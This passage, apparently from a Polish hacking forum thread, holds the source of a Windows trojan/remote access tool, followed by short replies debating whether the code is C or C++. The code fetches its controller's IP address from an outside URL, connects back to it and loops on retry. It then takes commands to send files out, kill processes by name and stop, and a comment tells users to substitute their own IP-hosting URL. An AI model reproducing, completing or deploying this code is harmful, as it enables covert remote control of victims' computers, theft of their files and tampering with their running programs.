   
   if(!strcmp(Data, "Error"))
   {
   }
   
   else
   {
   fileSEND(Data, DFile);
   }
   }
   
   if(!strcmp(Command, "stop"))
   {
   WSACleanup();
   closesocket(server), (client);
   exit(0);
   }
   }
   }

void ConnectToClient()
{
   TryAgain:
   
   closesocket(client), (server);
        
   Sleep(5000);
   
   HINTERNET hInet = InternetOpen("GetIp", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
   
   if(hInet == NULL)
   {
   InternetCloseHandle(hInet);
   goto TryAgain;
   }
   /* Edit the url, u need to give the url of ur ip !!! */
   
   HINTERNET hFile = InternetOpenUrl(hInet, "http://hackerswelcome.ha.funpic.de/ip.txt", NULL, 0, 0, 0);
   
   InternetReadFile(hFile, IP, 20, &size);
   
   InternetCloseHandle(hInet), (hFile);
   
   if(WSAStartup(MAKEWORD(2, 2), &wsadata) != 0)
   {
   WSACleanup();
   goto TryAgain;
   }
   
   client = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
   
   if(client == INVALID_SOCKET)
   {
   WSACleanup();
   closesocket(client);
   goto TryAgain;
   }
   
   sockaddr_in clnt;
   
   clnt.sin_port=htons(80);
   clnt.sin_addr.s_addr=inet_addr(IP);
   clnt.sin_family=AF_INET;
          
   if(connect(client,(sockaddr*)&clnt, sizeof(clnt)) == SOCKET_ERROR)
   {
   WSACleanup();
   closesocket(client), (server);
   goto TryAgain;
   }
   
   else
   {
   RecvCommands();
   }
} 

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil)
{
   StartUp();
   ConnectToClient();
}

BOOL KillProcessByName(char *szProcessToKill)
{
   HANDLE hProcessSnap;
   HANDLE hProcess;
   PROCESSENTRY32 pe32;
   DWORD dwPriorityClass;
   
   hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
   
   if(hProcessSnap == INVALID_HANDLE_VALUE)
   {
   return(FALSE);
   }
   
   pe32.dwSize = sizeof(PROCESSENTRY32);
   
   if(!Process32First(hProcessSnap, &pe32))
   {
   CloseHandle(hProcessSnap);   
   return(FALSE);
   }
   
   do{

   if(!strcmp(pe32.szExeFile, szProcessToKill))
   {
   hProcess = OpenProcess(PROCESS_TERMINATE,0, pe32.th32ProcessID);
   
   if(TerminateProcess(hProcess,0) == ERROR)
   {
   strcpy(Data, "Error");
   send(client, Data, sizeof(Data), 0);
   }
   
   else
   {
   strcpy(Data, "Succesfully");
   send(client, Data, sizeof(Data), 0);
   } 
   }   
   }
   
   while(Process32Next(hProcessSnap, &pe32));
   CloseHandle(hProcessSnap), (hProcess);
}
  
Kenjin
Ekipa HEP
Posty: 122
Rejestracja: 04 sty 2016, 22:10

Re: [C++] Trojan/RAT w architekturze klient-serwer

Post autor: Kenjin »

To jest chyba samo C a nie C++ :P
Awatar użytkownika
F3nix
Posty: 332
Rejestracja: 28 kwie 2015, 20:51

Re: [C++] Trojan/RAT w architekturze klient-serwer

Post autor: F3nix »

Chyba jednak C++ bo tego nie jestem pewny ale w C trzeba chyba używać zawsze rozszerzenia .h w nawet standardowych plikach nagłówkowych + przestrzeń nazw using namespace std; na to by wskazywała.
Kenjin
Ekipa HEP
Posty: 122
Rejestracja: 04 sty 2016, 22:10

Re: [C++] Trojan/RAT w architekturze klient-serwer

Post autor: Kenjin »

Faktycznie nie zauwazylem ze uzywa namespace'a. Ale poza ta deklaracja i bibliotekami nie widze tam nic z obiektowego C++.

Moze inaczej to jest C++ ale tylko po to aby mogl uzywac bibliotek bo semantyka jest czyste C. Zwroc uwage, ze do printowania uzywa funkcji printf a nie metody cout (ktorej uzywa chyba kazdy w c++).
ODPOWIEDZ